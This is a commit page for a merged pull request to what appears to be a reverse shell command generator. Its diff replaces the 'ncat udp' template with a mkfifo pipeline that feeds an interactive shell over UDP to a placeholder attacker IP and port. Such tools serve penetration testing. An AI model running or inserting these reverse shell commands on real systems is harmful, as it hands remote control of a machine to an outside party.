Merge pull request #61 from earthenvessel/main

Fixing ncat udp command.
This commit is contained in:
Ryan Montgomery 2021-08-12 12:34:12 -04:00 committed by GitHub
commit 2574e5fdff
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -76,7 +76,7 @@ const reverseShellCommands = withCommandType(
},
{
"name": "ncat udp",
"command": "ncat {ip} {port} -e {shell}",
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u {ip} {port} >/tmp/f",
"meta": ["linux", "mac"]
},
{